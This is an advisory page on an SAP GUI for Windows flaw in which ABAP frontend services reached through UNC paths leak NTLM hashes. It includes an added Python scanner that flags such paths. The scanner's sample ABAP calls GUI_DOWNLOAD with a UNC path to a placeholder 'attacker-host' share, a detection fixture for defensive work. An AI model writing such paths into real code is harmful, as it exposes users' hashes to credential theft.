SAP GUI for Windows NTLM Hash Leak Vulnerability

Vulnerability

A vulnerability in SAP GUI for Windows could lead to the unintentional disclosure of NTLM hash values. This issue arises when certain ABAP frontend services are accessed using UNC paths. For the vulnerability to be exploited, the attacker must have developer authorization on a specific Application Server ABAP to modify the code. Additionally, the victim must use SAP GUI for Windows, which could trigger automatic NTLM authentication, potentially revealing hashed credentials to the attacker. This vulnerability significantly impacts confidentiality.
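As an added defender-side example (not from the advisory, SAP, or any SAP system), here is a small static check for ABAP source that flags frontend-service statements whose path argument is a UNC literal, or a variable that cannot be resolved to a literal and therefore needs manual review. The service and parameter names it matches are assumptions, since the advisory names none, and the ABAP fragment is constructed.

```python
import re

# Frontend-service entry points assumed to hand a client-side path to SAP GUI;
# the advisory names none, so this list is an assumption.
FRONTEND_CALL = re.compile(
    r"CALL FUNCTION\s+'(?:GUI_DOWNLOAD|GUI_UPLOAD|WS_DOWNLOAD|WS_UPLOAD)'"
    r"|CL_GUI_FRONTEND_SERVICES=>\w+", re.IGNORECASE)
# Path-carrying parameters (assumed names): a quoted literal or a variable name.
PATH_PARAM = re.compile(
    r"\b(?:filename|file_name|file|directory)\s*=\s*('[^']*'|\w+)", re.IGNORECASE)
ASSIGNMENT = re.compile(r"^(\w+)\s*=\s*('[^']*')\s*\.$", re.IGNORECASE)
UNC_LITERAL = re.compile(r"^'(?:\\\\|//)[^\\/']+[\\/]")  # '\\host\share or '//host/share

def statements(source):
    # Join lines into ABAP statements (terminated by '.'), skipping '*' comment lines.
    buf = []
    for line in source.splitlines():
        if not line.strip() or line.lstrip().startswith("*"):
            continue
        buf.append(line.strip())
        if line.rstrip().endswith("."):
            yield " ".join(buf)
            buf = []

def scan_abap(source):
    # Returns (severity, path, statement): "high" when the path resolves to a UNC
    # literal, "review" when it is a variable with no visible literal assignment.
    literals, findings = {}, []
    for stmt in statements(source):
        m = ASSIGNMENT.match(stmt)
        if m:
            literals[m.group(1).lower()] = m.group(2)
        elif FRONTEND_CALL.search(stmt):
            for p in PATH_PARAM.finditer(stmt):
                arg = p.group(1)
                value = arg if arg.startswith("'") else literals.get(arg.lower())
                if value is None:
                    findings.append(("review", arg, stmt))
                elif UNC_LITERAL.match(value):
                    findings.append(("high", value, stmt))
    return findings

# Constructed ABAP fragment; host, share and variable names are placeholders.
SAMPLE_ABAP = r"""
lv_unc = '\\attacker-host\share\x.txt'.
CALL FUNCTION 'GUI_DOWNLOAD' EXPORTING filename = lv_unc TABLES data_tab = lt_data.
CALL FUNCTION 'GUI_UPLOAD' EXPORTING filename = 'C:\temp\local.txt' TABLES data_tab = lt_data.
cl_gui_frontend_services=>file_exist( EXPORTING file = lv_dynamic RECEIVING result = lv_ok ).
"""
```

Running `scan_abap(SAMPLE_ABAP)` reports the GUI_DOWNLOAD call as "high" (its variable resolves to a UNC literal) and the file_exist call as "review" (runtime-built path); the local C:\ path produces no finding.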

Impact

Exploitation of this vulnerability could result in the unauthorized exposure of NTLM hash credentials, allowing an attacker to potentially misuse these hashes in authentication-related attacks, such as pass-the-hash scenarios.

Remediation

Users are advised to review and implement the SAP Security Note related to this vulnerability, available through the SAP Security Patch Day Bulletin. For guidance on accessing and applying SAP Security Notes, refer to the SAP Security Notes FAQs.

Added: Aug 12, 2025, 3:50 AM
Updated: Aug 12, 2025, 3:50 AM

Vulnerability Rating

Custom Algorithm
spread: 6.6
impact: 2.5
exploitability: 2.5
remediation: 0.0
relevance: 0.3
threat: 0.0
urgency: 2.9
incentive: 0.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.